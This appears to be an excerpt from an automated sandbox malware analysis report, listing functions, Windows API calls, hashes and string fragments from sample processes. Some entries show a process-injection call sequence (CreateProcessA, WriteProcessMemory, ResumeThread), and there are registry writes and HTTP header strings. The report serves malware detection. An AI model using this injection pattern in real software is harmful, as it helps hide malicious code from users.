Instruction Fuzzy Hash: D901F630640209BFEF119FA0DC45F8DBEB5BF04B15F2041A8BE14BD1E5DB71AA60AB54

Function 001C2740 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 001C275C
SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 001C2779
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 001C2795
CloseHandle.KERNEL32(?), ref: 001C27A6

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction ID: e83ab4e8bfacfcbb9057bf8691385a7719df8e694ba331f985fc6044b9c84708
Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction Fuzzy Hash: E501E430640209FFEF119FA0DC86F8D7AB5AF14B14F2041A8BA14B91E5D771AA20AB54

Function 0214089D Relevance: 6.0, APIs: 4, Instructions: 18registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,0214086F,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 021408A5
lstrlen.KERNEL32(80000001), ref: 021408AE
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,80000001,00000000), ref: 021408CC
RegCloseKey.ADVAPI32(?), ref: 021408D8

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 820b913730b8b1205efda1ba5cf004e50c56167a5a19f0837e88c4a92b8022be
Instruction ID: 71657a73426316f7f99f7eea358e922308814917e668a8bed2c713ca4b7d17c0
Opcode Fuzzy Hash: 820b913730b8b1205efda1ba5cf004e50c56167a5a19f0837e88c4a92b8022be
Instruction Fuzzy Hash: 4BE09272100018BFEF126F60DC89E997B76EF54305F1440A0FE4AAD0B5CBB19AA0DF68

Analysis Process: TbOpfOXygan.exePID: 5700, Parent PID: 616COMMON

Executed Functions

Function 0234097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 73f7dd05df2c3e4670bc0233410b8aa763c4ff8ff0558656eca81f311a437329
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: D3416F71640214AFEB269F60CC85FA977ECEF44744F0401D5BB49BE0D5DBB0A690CE69

Function 02341386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 2aa286ea0953e27a0ff4016d4f5364c36456e627daa9693dad06d4d7939534c6
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 32219D31A0021AAFDB11DF78C848B9DBBF5AF04714F458265F999AF2D0EB70E810CB94

Function 02341528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
Instruction ID: c19063a0d35016acd4fc3c094487242e3f66d2355471c88c964ea10eabb2b839
Opcode Fuzzy Hash: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
Instruction Fuzzy Hash: 4E1191724045149EDF13AF60C5C4CAA73EDEE40708B4509AA9DC9EF44DEF74A194CEE5

Function 023409A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: ebc7dddeaa83895b0c0178e082e3d95b77ed7de3ef5d33ce06aab4c619e48dc5
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: 7201F971644318AFEB12DE50CC45FA573FCEF44B04F500595BB45EE0C5EAB065448AD9

Function 02343FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: 47aa32b92589f91f5a0737d58e4b279e43eb358cc1bfdb16babc015b37f305af
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: 86F03070548280E7FB707BB0AC89B4DB6E99F01709F0400E0EB49BF495CE7874608E72

Non-executed Functions

Function 023447F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ie: , xrefs: 023448B1
nt: , xrefs: 02344939
-Age, xrefs: 02344933
User, xrefs: 0234492D
Cook, xrefs: 023448AB

Memory Dump Source

Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: 5c3abeb0560b008391e0d6cc2056a90345e9dc48dde703bc97eae87da102004d
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: B94162B2604208BFEF129F64CC44BDEBBB9FF84744F1540A9EA44AB154DB709650DB94

Function 023447F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ie: , xrefs: 023448B1
nt: , xrefs: 02344939
-Age, xrefs: 02344933
User, xrefs: 0234492D
Cook, xrefs: 023448AB

Memory Dump Source

Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: 8b6a152347b2c2fe077d5667fbdf11befb22a919a8ef97c7d7c1d081940ce608
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: D94151B2600208BFEF129F64CC48BDEBBB9FF84744F1540A9EA44AB154DB70A650DB94

Analysis Process: TbOpfOXygan.exePID: 1372, Parent PID: 616COMMON

Executed Functions

Function 00D6097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: c6111cb3902a05132986dd9956a33f51c7bafc97d0e0039d67a0bb8fc18cec66
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 7C415171640214AFEF129F64CC85FAA77BCEF44744F080195BA49FE0D6DB70AA90CE65

Function 00D61386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 13fec5c9fe638e7d3a3575a16c9a647fe03491c9faa9c0d52d61d37c0d377262
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: C2219D3190021AAFDB11DF79C849B9DBBB5AF04710F098225F955AF2D1EB70A810CBA4

Function 00D61528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction ID: 372c0278b42354de2f03ac963bba075068ed9caf850db88c84dc71b41d590ff6
Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction Fuzzy Hash: EE11C1B24145149FDF03AF60C5C4CAA73ECEE40704B450A6AAD85EF44EEF709154CAF5

Function 00D609A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: d1b8698850c36b551d4aef4108b1e0c37064d24966ec4278c54291a7cbd13300
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: EC014971644318AFEB12DE50CC41FA673FCEF44B04F500195BB45EE0C5DA7065448AE9

Function 00D63FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction ID: 7ec128fdc72bf20784acffaaa6e3e0d5a9310e1518eb4999ac9cfb1681defbc1
Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction Fuzzy Hash: A6F0C9705483A0DBFB517BB0CC8AB4D36A8DF41709F040091FB4ABF496CE7895909E76

Non-executed Functions

Function 00D647F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 00D6492D
nt: , xrefs: 00D64939
-Age, xrefs: 00D64933
Cook, xrefs: 00D648AB
ie: , xrefs: 00D648B1

Memory Dump Source

Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: 47ed27bf5f6827464b64d30b7cd586f801aaf95ff0d0ceb2b2a2ddd1c523576b
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: C74174B2600208BFEF129F64CC84BEEBBB9FF84744F154159EA44AB154DB709A50CFA4

Function 00D647F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 00D6492D
nt: , xrefs: 00D64939
-Age, xrefs: 00D64933
Cook, xrefs: 00D648AB
ie: , xrefs: 00D648B1

Memory Dump Source

Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: c235768e580db4b26e0156dda21e079f6bda2cd72bd8fb40d3d548f133835dc4
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: E54165B2600208BFEF129F64CC48BDEBBB9FF84744F154159EA44AB154DB709A54CFA4

Analysis Process: TbOpfOXygan.exePID: 3544, Parent PID: 616COMMON

Executed Functions

Function 00E1097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 40b4fc8f6729bc0b59034b30eef40e39e0f26fdfac25dc564f08aa919d3e04be
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 8B415071644214AFEB229F60CC85FA977BCEF44748F040195BA49FE0D6DAB0AAD0CA65

Function 00E11386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 885839e345444ae3b26f3a5103d39deac75cadd3afa698911024d4a055bd93a6
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: FF219D31900226AFDB11DF78C849B9DBBB5AF04714F058265FA65BF2D0E770A850CB94

Function 00E11528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
Instruction ID: f5ba2dfc3a595277c8171dfbf80d7504a47678decd6b1b42a99c4fdb2534b9ad
Opcode Fuzzy Hash: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
Instruction Fuzzy Hash: 8C11BFB24045149EDF03AF20C5C4CEA73ECEE40704B460AAAAD85EF44EEF709194CAE5

Function 00E109A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: a7315e410356c332060183bf0a9f60230e0d0f20eedd974560e69c7274da7810
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: 2B01E171644318AFEB129A50CC86FAA73ECEF54B08F500595BB49FE0C5EAB065848A99

Function 00E13FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction ID: 11a70f58982d5ba3143c3fe0a0aee720dbdd2b4ed7956dfaa127c2365fad37fc
Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction Fuzzy Hash: 39F01CF0548284D6EB517BB18C8ABCD36E89F05709F082091BB4ABE5D6CE7849D09E73

Non-executed Functions

Function 00E147F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nt: , xrefs: 00E14939
-Age, xrefs: 00E14933
ie: , xrefs: 00E148B1
Cook, xrefs: 00E148AB
User, xrefs: 00E1492D

Memory Dump Source

Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: 4cb01924d64e39d0bcef8b13a9d6f9de6a56be6c98b03d755a869347a78b57ec
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: BB4185B2600209BFEF129F64CC44BEEBBB9FF84744F154059EA44BB254DB709A90CB94

Function 00E147F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nt: , xrefs: 00E14939
-Age, xrefs: 00E14933
ie: , xrefs: 00E148B1
Cook, xrefs: 00E148AB
User, xrefs: 00E1492D

Memory Dump Source

Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: 6f94d75579c5b823cf8c69a2e3016f4ad14e0ba8cce454222f4ad3d07e71921c
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: A54152B2600209BFEF129F64CC48BDEBBB9FF84744F154059EA44BA254DB749A90CB94

Analysis Process: bin.exePID: 2532, Parent PID: 7064COMMON

Executed Functions

Function 008B0005 Relevance: 22.1, APIs: 14, Instructions: 1058COMMON

Download Yara Rule

APIs

Part of subcall function 008B09CC: OpenMutexA.KERNEL32(001F0001,00000000), ref: 008B09E6
Part of subcall function 008B09CC: GetStartupInfoA.KERNEL32(00000000), ref: 008B09FE

ExitProcess.KERNEL32(00000000), ref: 008B001D

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: ExitInfoMutexOpenProcessStartup
String ID:
API String ID: 213680645-0
Opcode ID: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
Instruction ID: f0f0e538f7286c12f200f563276c3c4a3a64b75394928d1031e9b1840abaa6fc
Opcode Fuzzy Hash: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
Instruction Fuzzy Hash: 6D72DF6144E3C44FDB279B744A696E77FB8FE23300B1900CBD5C2DA2A3D114A919CF6A

Function 001D097F Relevance: 18.1, APIs: 12, Instructions: 120
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 001D099A
RtlExitUserThread.NTDLL(00000000), ref: 001D09A2
OpenMutexA.KERNEL32(001F0001,00000000), ref: 001D09C2
GetStartupInfoA.KERNEL32(00000000), ref: 001D09DA

Part of subcall function 001D0A1A: CreateProcessA.KERNEL32(00000000,001D0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001D0A21
Part of subcall function 001D0A1A: GetThreadContext.KERNEL32(?,00000000), ref: 001D0A49
Part of subcall function 001D0A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001D0A74
Part of subcall function 001D0A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001D59C8,00000000,00000000,00000002), ref: 001D0AB9
Part of subcall function 001D0A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001D0AE7
Part of subcall function 001D0A1A: ResumeThread.KERNEL32(?), ref: 001D0AF7
Part of subcall function 001D0A1A: Sleep.KERNEL32(000003E8), ref: 001D0B07
Part of subcall function 001D0A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001D0B1E

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
String ID:
API String ID: 1099281029-0
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 082682ca218d509e8b97d2b081184659538a72c7bb53fd5271c365d2e80bc17b
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 79416E71644218AFEB229F60CC85FA973ACEF44744F040196BA49FE1D6DB70AA90CA65

Function 001D3FDE Relevance: 6.0, APIs: 4, Instructions: 26
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,001D3FD4,0000000A,?,00000000,0000000A), ref: 001D3FFE
Sleep.KERNELBASE(000003E8,00000000,?,001D3FD4,0000000A,?,00000000,0000000A), ref: 001D4020
Sleep.KERNEL32(000007D0), ref: 001D4030
Sleep.KERNEL32(00000BB8), ref: 001D4040

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: Sleep$HandleModule
String ID:
API String ID: 3646095425-0
Opcode ID: ca8bade2fa3014c6295aeb49c6cd976e82bb18be483983e3bf0c9f83518ae4e7
Instruction ID: cb225ea012cf25cff74d14a7e588ba9ae8d8254d5375bee7332d2628dd3bb714
Opcode Fuzzy Hash: ca8bade2fa3014c6295aeb49c6cd976e82bb18be483983e3bf0c9f83518ae4e7
Instruction Fuzzy Hash: 22F030705482D0D7FB507BB08C8AB8D37A89F21709F040192FB4DBE696CF7855509EB2

Function 001D1386 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13B3
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13C8
VirtualProtect.KERNELBASE(?,00000020,?,001D1434,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D142F

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 81cce27e9cc97897a17432a1da4ec70d2c481a3048042f36efaf7e8e6c3cf0c8
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 84219D71900216BFDB12DF78C849B9DBBB5AF04710F058226F955AF2D0E770A810CB94

Function 001D1528 Relevance: 1.6, APIs: 1, Instructions: 51
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(001D1522,00000006,?,00000000), ref: 001D152D

Part of subcall function 001D0CDD: GetProcAddress.KERNEL32(00000000,001D04B1), ref: 001D0CEA

Part of subcall function 001D1386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13B3
Part of subcall function 001D1386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13C8
Part of subcall function 001D1386: VirtualProtect.KERNELBASE(?,00000020,?,001D1434,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D142F

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: Virtual$Protect$AddressAllocLibraryLoadProc
String ID:
API String ID: 2821516111-0
Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction ID: 2d2f9b8d02abb84d4c96300e0439f1bfeb0b1241f0ed4f782f31c4e334e0294e
Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction Fuzzy Hash: A811BFB2404514BEDF03AF20C5C4CAA73ECFE50704B450A6BAD85EF44AEF749154CAE5

Function 008B3511 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNELBASE(008B350D,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 008B3511

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

